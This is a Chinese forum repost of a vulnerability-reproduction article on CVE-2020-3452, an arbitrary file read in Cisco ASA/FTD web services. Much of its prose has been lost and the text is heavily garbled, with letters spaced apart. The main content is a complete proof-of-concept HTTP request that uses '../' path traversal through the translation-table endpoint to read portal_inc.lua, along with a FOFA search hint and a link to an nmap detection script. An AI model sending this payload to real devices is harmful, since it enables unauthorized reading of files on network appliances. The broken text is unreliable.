[27347] 2020-07-23_CISCOASA设备任意文件读取漏洞复现(CVE-2020-3452)

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-19
2020-07-23_CISCOASA设备任意文件读取漏洞复现(CVE-2020-3452) C I S C O   A S A   ( C V E - 2 0 2 0 - 3 4 5 2 )   n e a r s e c   N e a r S e c   2 0 2 0 - 0 7 - 2 3     0 x 0 1   C i s c o   A d a p t i v e   S e c u r i t y   A p p l i a n c e   ( A S A )   C i s c o   F i r e p o w e r   T h r e a t   D e f e n s e   ( F T D ) W E B 穿 A S A F T D ( O S ) 访 w e b w e b v p n c o o k i e s 0 x 0 2   F O F A P O C n m a p / + C S C O E + / C i s c o - A S A G E T   / + C S C O T + / t r a n s l a t i o n - t a b l e ? t y p e = m s t & t e x t d o m a i n = / % 2 b C S C O E % 2 b / p o r t a l _ i n c . l u a & d e f a u l t - l a n g u a g e & l a n g = . . /   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 0 . 1 C o n n e c t i o n :   c l o s e U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 8 . 0 . 3 0 2 9 . 1 1 0   S a f a r i / 5 3 7 . 3 6   S E   2 . X   M e t a S r   1 . 0 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , * / * ; q = 0 . 8 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 8 C o o k i e :   w e b v p n L a n g = e n ;   w e b v p n l o g i n = 1 h t t p s : / / g i t h u b . c o m / R o o t U p / P e r s o n a l S t u f f / b l o b / d d 4 f 9 e 2 c d 1 c b 6 d 6 a 1 9 0 7 2 6 d 5 4 8 f a b e 0 e c 4 b 8 b 7 c 8 / h t t p - v u l n - c v e 2 0 2 0 - 3 4 5 2 . n s e
0 x 0 3   C i s c o   A S A C i s c o   F T D 0 x 0 4   : 1 . h t t p s : / / m p . w e i x i n . q q . c o m / s / 6 g x B b K A e v k 2 3 I O G Q r N v X 5 A 2 . h t t p s : / / n v d . n i s t . g o v / v u l n / d e t a i l / C V E - 2 0 2 0 - 3 4 5 2 3 . h t t p s : / / t o o l s . c i s c o . c o m / s e c u r i t y / c e n t e r / c o n t e n t / C i s c o S e c u r i t y A d v i s o r y / c i s c o - s a - a s a f t d - r o - p a t h - K J u Q h B 8 n e a r s e c h t t p s : / / g i t h u b . c o m / R o o t U p / P e r s o n a l S t u f f / b l o b / d d 4 f 9 e 2 c d 1 c b 6 d 6 a 1 9 0 7 2 6 d 5 4 8 f a b e 0 e c 4 b 8 b 7 c 8 / h t t p - v u l n - c v e 2 0 2 0 - 3 4 5 2 . n s e

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则